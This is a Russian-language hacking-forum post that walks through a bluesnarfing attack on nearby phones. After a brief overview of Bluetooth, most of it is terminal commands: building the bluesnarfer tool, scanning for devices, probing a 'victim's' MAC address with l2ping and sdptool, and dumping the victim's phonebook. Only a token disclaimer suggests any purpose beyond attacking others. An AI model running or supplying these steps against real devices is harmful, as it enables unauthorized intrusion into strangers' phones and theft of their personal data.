Перейти к содержимому



Фотография
  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 roguevad

roguevad

    Эксперт.

  • Пользователи
  • PipPipPipPipPip
  • 387 сообщений

Отправлено 08 Март 2021 - 11:55

Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами.

Спецификация Bluetooth была разработана группой Bluetooth Special Interest Group, которая была основана в 1998 году. Данная технология по сей день остается актуальной и используется во многих персональных устройствах.

В рамках данной статьи мы разберемся, насколько безопасна данная технология, а также разберем метод эксплуатации уязвимостей Bluetooth с помощью утилиты под названием Bluesnarfer.

 

Установка и эксплуатация

Открываем терминал и вводим команду для обновления пакетов:

sudo apt-get update && apt-get upgrade

Далее клонируем репозиторий с помощью команды:

git clone https://github.com/boos/bluesnarfer

Переходим в директорию:

cd bluesnarfer

И компилируем утилиту:

make

После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере:

hciconfig hci0 up

Далее сканируем доступные устройства с включенным Bluetooth:

hcitool scan

Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит:

l2ping <MAC-адрес жертвы>

Просматриваем возможность подключения к жертве, используя rfcomm:

sdptool browse --tree --l2cap <MAC-адрес жертвы>

Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы:

bluesnarfer -r <диапазон> -b <MAC-адрес жертвы>

Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки:

bluesnarfer -h

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 





Темы с аналогичным тегами взлом, взломщик, хакер, хакинг, взлом через блютуз, взлом телефона через блютуз, bluetooh взлом, уязвимость, эксплойт, взлом телефона, взлом смартфона


Яндекс.Метрика Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal